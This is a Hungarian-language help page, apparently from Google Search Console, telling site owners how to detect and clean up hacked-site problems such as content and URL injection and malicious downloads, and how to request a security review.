Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Feltörés típusa: tartalombeékelés

Hackertől származó spam jellegű linkek vagy szövegek találhatók webhelye oldalain. A tartalom lehet például gyógyszerészeti kifejezés, vagy más, a webhely tartalmához nem illeszkedő spam.

A hackerek általában a következő módszerek egyikével módosítják a webhelyeket:

  • Hozzáférést nyernek egy nem biztonságos könyvtárhoz a szerveren. Például előfordulhat, hogy Ön véletlenül nyílt engedélyekkel hagyott meg egy könyvtárat.
  • A webhelyen futó valamely szoftver (pl. tartalomkezelő rendszer) sebezhetőségét használják ki. Ez például akkor fordulhat elő, ha a Drupal, a Joomla! vagy a WordPress régebbi verzióját használja.
  • Feltörik a webhely egyik harmadik féltől származó bővítményét, például a látogatószámlálót.

1. Döntse el, hogy meg tudja-e oldani a problémát

Az Állítson össze támogatási csapatot oldalt elolvasva képet kaphat arról, hogy mi szükséges az önálló helyreállításhoz, és azt is megtudhatja, hogy miként találhat segítséget, ha túl nehéznek látja a feladatot.

2. Győződjön meg a probléma jelenlétéről

Ne használjon böngészőt webhelye fertőzött oldalainak közvetlen megtekintéséhez.

A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, ezért ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében, azzal károsíthatja számítógépét. Vegye figyelembe azt is, hogy a hackerek álcázási technikák segítségével elrejthetik a spam jellegű tartalmakat a webhelytulajdonosok elől.

A következő módszerekkel biztonságosabban megtekintheti számítógépén a webes tartalmakat:

  • Az URL-ellenőrző eszközzel úgy tekintheti meg az oldalt, ahogyan a Google látja. Ez azért hasznos, mert a hackerek sok esetben olyan változtatásokat eszközölnek, amelyek csak a Google számítógépei által láthatók. Például elhelyezhetnek webhelyén saját oldalaikra mutató linkeket, amelyek csak akkor jelennek meg, ha a hivatkozó a Google.
  • A cURL vagy a Wget segítségével HTTP-kéréseket (például oldallekérést) indíthat a parancssorból. Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek – többek között megadhat velük hivatkozót és felhasználói ügynököt jelölő információkat is. A hackerek gyakran csak bizonyos felhasználói ügynököket vagy hivatkozókat céloznak, hogy rejtve maradhassanak és jobb célpontokat választhassanak. Ezekkel az eszközökkel célpontnak álcázhatja magát. Ha kérése nem tanúsítja a spam jellegű viselkedést, próbálkozzon más hivatkozó címmel (például nagy weboldalak linkjeivel vagy egyéb keresőmotorokkal). Ha például egy olyan felhasználót személyesítene meg, aki a Google Keresés egy találatán keresztül a www.example.com/page.html címre érkezik, akkor a cURL-t a következő módon kell használnia:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Kérje le a webhely néhány oldalát, és keressen a válaszban gyanús tartalmakat és idegenektől származó linkeket. Keressen például gyógyszerészeti kifejezésekre vagy más spam jellegű szavakra (pl. viagra vagy pénzkeresés).

3. Tisztítsa meg a webhelyét

Ha készen áll webhelye megtisztítására, cserélje az érintett fájlokat a legutóbbi érintetlen biztonsági másolatokra, vagy távolítsa el kézzel a spam jellegű tartalmakat és linkeket az oldalakról. Oldja meg a Biztonsági problémák jelentésben látható összes problémát. Javasoljuk továbbá, hogy keressen a Google-ban webhelye további esetlegesen feltört oldalaira is a „site:” módosító szóval, és ellenőrizze a webhelyéhez tartozó forrásfájlokat is.

Továbbá:

  • A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is.

4. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Feltörés típusa: URL-injekció

Hackertől származó új oldalak kerültek webhelyére, amelyeken spam jellegű szavak vagy linkeket szerepelnek. Ezek az új oldalak olyan kódot is tartalmazhatnak, amelyet nem Ön írt. Ilyen például a felhasználók átirányítása más webhelyekre, vagy a webszerver részvétele más webhelyek szolgáltatásmegtagadással járó megtámadásában.

1. Döntse el, hogy meg tudja-e oldani a problémát

Az Állítson össze támogatási csapatot oldalt elolvasva képet kaphat arról, hogy mi szükséges az önálló helyreállításhoz, és azt is megtudhatja, hogy miként találhat segítséget, ha túl nehéznek látja a feladatot.

2. Győződjön meg a probléma jelenlétéről

Ne használjon böngészőt webhelye fertőzött oldalainak közvetlen megtekintéséhez.

A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, ezért ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében, azzal károsíthatja számítógépét. Vegye figyelembe azt is, hogy a hackerek álcázási technikák segítségével elrejthetik a spam jellegű tartalmakat a webhelytulajdonosok elől.

A következő módszerekkel biztonságosabban megtekintheti számítógépén a webes tartalmakat:

  • Az URL-ellenőrző eszközzel úgy tekintheti meg az oldalt, ahogyan a Google látja. Ez azért hasznos, mert a hackerek sok esetben olyan változtatásokat eszközölnek, amelyek csak a Google számítógépei által láthatók. Például elhelyezhetnek webhelyén saját oldalaikra mutató linkeket, amelyek csak akkor jelennek meg, ha a hivatkozó a Google.
  • A cURL vagy a Wget segítségével HTTP-kéréseket (például oldallekérést) indíthat a parancssorból. Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek – többek között megadhat velük hivatkozót és felhasználói ügynököt jelölő információkat is. A hackerek gyakran csak bizonyos felhasználói ügynököket vagy hivatkozókat céloznak, hogy rejtve maradhassanak és jobb célpontokat választhassanak. Ezekkel az eszközökkel célpontnak álcázhatja magát. Ha kérése nem tanúsítja a spam jellegű viselkedést, próbálkozzon más hivatkozó címmel (például nagy weboldalak linkjeivel vagy egyéb keresőmotorokkal). Ha például egy olyan felhasználót személyesítene meg, aki a Google Keresés egy találatán keresztül a www.example.com/page.html címre érkezik, akkor a cURL-t a következő módon kell használnia:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Kérje le a jelentésben szereplő példa URL-eket. Nézze meg, hogy aktívak-e. Ezeket az oldalakat valószínűleg nem Ön készítette, ezért el kell távolítania őket webhelyéről, illetve adott esetben el kell távolítania a kódot is, amely automatikusan előállítja őket. Olvassa el, hogyan találhatja meg és távolíthatja el ezeket az oldalakat webhelyéről.

Egy „site:” keresés is segíthet a mástól származó oldalak azonosításában.

  • Ha webhelye kisebb méretű, a [site:example.com] kereséssel áttekintheti a Google Keresésben azokat az oldalakat, amelyeket indexeltünk – így azokat is megtalálja, amelyeket nem Ön készített.
  • Nagyobb webhelyek esetében használjon pontosabb kifejezést, például:
    • [site:example.com pharmacy]: az example.com minden olyan oldala, amelyen szerepel a „pharmacy” szó. A „pharmacy” szó mellett használjon más gyakori spam jellegű kifejezéseket is.
    • [site:example.com/wp-admin/]: WordPress-webhelyének minden olyan oldala, amely az adminisztrátori szakaszhoz tartozik.

3. Tisztítsa meg a webhelyét

Ha készen áll webhelye megtisztítására, lecserélheti az érintett mappákat a legutóbbi érintetlen biztonsági másolatokra, vagy eltávolíthatja a nemkívánatos oldalakat és azokat a fájlokat vagy függvényeket, amelyekkel a hacker létrehozta őket.

Továbbá:

  • A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is.

4. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Szokatlan letöltések

Webhelye olyan letöltést nyújt, amelyet a Google Biztonságos Böngészés korábban még nem látott. A Chrome böngésző figyelmeztetést jeleníthet meg, miszerint ritkán letöltött fájlról van szó, amely veszélyes lehet. Ezek a figyelmeztetések automatikusan eltűnnek, miután a Google Biztonságos Böngészés igazolta, hogy a fájok biztonságosak.

1. Javítsa ki a problémát

Ellenőrizze, hogy a letöltések megfelelnek-e a letöltésekre vonatkozó irányelveknek. Távolítsa el az irányelveket sértő letöltéseket. Az irányelveknek megfelelő letöltéseket nem kell eltávolítania; kérjen felülvizsgálatot az alábbiaknak megfelelően. Ehhez a problématípushoz nem minden esetben szerepelnek példa URL-ek a jelentésben.

2. Kérjen felülvizsgálatot

Ha eltávolította a fájlokat (vagy biztos benne, hogy mindegyik letöltés megfelel az irányelveknek), kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésben. A felülvizsgálat néhány naptól néhány hétig tarthat.

Kártékony letöltések

Webhelyéről olyan tartalmak tölthetők le, amelyek a Google Biztonságos Böngészés szerint rosszindulatú vagy nemkívánatos szoftverek. A Chrome böngésző figyelmeztetést jeleníthet meg a webhelyét megnyitó felhasználóknak. A figyelmeztetés megszüntetéséhez el kell távolítania ezeket a letöltéseket.

1. Mérje fel a problémát

Ha szándékos letöltésekről van szó, távolítsa el őket, majd kérjen felülvizsgálatot.

Ha nincs tudomása ezekről a letöltésekről, webhelyét feltörhették. Javítsa ki feltört webhelyét, majd keresse meg és távolítsa el a letöltéseket.

2. Döntse el, hogy meg tudja-e oldani a problémát

Az Állítson össze támogatási csapatot oldalt elolvasva képet kaphat arról, hogy mi szükséges az önálló helyreállításhoz, és azt is megtudhatja, hogy miként találhat segítséget, ha túl nehéznek látja a feladatot.

3. Győződjön meg a probléma jelenlétéről

Nyisson meg néhányat a példaként felsorolt oldalak közül és győződjön meg a letöltések jelenlétéről.

4. Tisztítsa meg a webhelyét

A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is. Ha készen áll webhelye megtisztítására, cserélje le az érintett fájlokat a legutóbbi érintetlen biztonsági másolatokra, vagy távolítsa el kézzel a spam jellegű tartalmakat. Ellenőrizze vírusirtóval a bináris fájlokat és a webhelyén tárolt egyéb tartalmakat. A vírusirtó szoftverek számos típusú rosszindulatú és más nemkívánatos szoftvert képesek megtalálni, ám sajnos nem az összeset. Képet kaphat a potenciális problémákról, ha ellenőrzi szoftverét egy vírusirtó programmal (vagy vírusirtókat összesítő szolgáltatással, amilyen például a VirusTotal). A Google Biztonságos Böngészés szolgáltatás a saját feltételei alapján határozza meg, hogy egy program vagy bináris fájl nemkívánatos szoftvernek vagy rosszindulatú programnak minősül-e.

5. Ellenőrizze a javításokat

Győződjön meg arról, hogy webhelye megfelel a nemkívánatos szoftverekkel kapcsolatos irányelveinknek.

6. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Kártékony letöltésekre mutató linkek

Webhelye olyan webhelyekre mutató linkeket tartalmaz, ahonnan a Google Biztonságos Böngészés szerint rosszindulatú vagy nemkívánatos szoftverek tölthetők le. A Chrome böngésző figyelmeztetést jeleníthet meg a webhelyét megnyitó felhasználóknak. A figyelmeztetés megszüntetéséhez el kell távolítania a kártékony webhelyekre mutató linkeket.

1. Mérje fel a problémát

Ha szándékos linkekről van szó, távolítsa el őket, majd kérjen felülvizsgálatot.

Ha nincs tudomása ezekről a linkekről, webhelyét feltörhették.

2. Döntse el, hogy meg tudja-e oldani a problémát

Az Állítson össze támogatási csapatot oldalt elolvasva képet kaphat arról, hogy mi szükséges az önálló helyreállításhoz, és azt is megtudhatja, hogy hogyan találhat segítséget, ha túl nehéznek látja a feladatot.

3. Győződjön meg a probléma jelenlétéről

 

Nyisson meg néhányat a példaként felsorolt oldalak közül és győződjön meg a letöltések jelenlétéről. A hackerek megpróbálhatják elrejteni a linkeket a webhely tulajdonosa elől, ezért javasoljuk, hogy az URL-ellenőrző eszköz segítségével vagy más fiókkal és más számítógépen bejelentkezve nyissa meg a példaként felsorolt URL-eket.

4. Tisztítsa meg a webhelyét

A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is. Ha készen áll webhelye megtisztítására, cserélje le az érintett fájlokat a legutóbbi érintetlen biztonsági másolatokra, vagy távolítsa el kézzel a spam jellegű tartalmakat.

5. Ellenőrizze a javításokat

Győződjön meg arról, hogy webhelye megfelel a nemkívánatos szoftverekkel kapcsolatos irányelveinknek.

6. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Nem egyértelmű mobilos számlázás

A Google azt észlelte, hogy az Ön webhelye nem tájékoztatja megfelelően a felhasználókat a mobilos díjakról. A Chrome figyelmeztetést jeleníthet meg a díjat felszámító oldalakat megnyitó felhasználóknak.

1. Győződjön meg a probléma jelenlétéről

A jelentésben szereplő példa URL-eket megnyitva ellenőrizze, hogy mely oldalakon található nem egyértelmű mobilos számlázás. Itt elolvashatja a mobilos számlázással kapcsolatos irányelveinket.

2. Javítsa ki a problémát

Javítsa az oldalakat, hogy megfeleljenek a mobilos számlázással kapcsolatos irányelveknek.

3. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Mi a különbség a Kézi műveletek jelentés és a Biztonsági problémák jelentés között?

A Kézi műveletek jelentés az oldallal vagy webhellyel kapcsolatos olyan manuálisan észlelt problémákat sorolja fel, amelyek javarészt a keresési indexünk manipulálásával kapcsolatosak, és nem szükségszerűen veszélyesek a felhasználókra nézve. Az itt megjelenő legtöbb probléma csak az oldal vagy webhely alacsonyabb rangsorolását vagy a keresési találatokból való kihagyását eredményezi; anélkül hogy ez látható lenne a felhasználó számára.

A Biztonsági problémák jelentés arról sorol fel figyelmeztetéseket, hogy a webhelyet feltörték, illetve, hogy olyan viselkedés tapasztalható rajta, amely ártalmas lehet a látogatóra vagy a látogató számítógépére nézve: ilyenek például az adathalász jellegű támadások vagy a rosszindulatú/nemkívánatos szoftverek telepítése a felhasználó számítógépére. Ezek az oldalak figyelmeztető címkével jelenhetnek meg a keresési találatok között, de a böngésző figyelmeztető oldalt is megjeleníthet, amikor a felhasználó megpróbálja megnyitni őket.

Hasznosnak találta?
Hogyan fejleszthetnénk?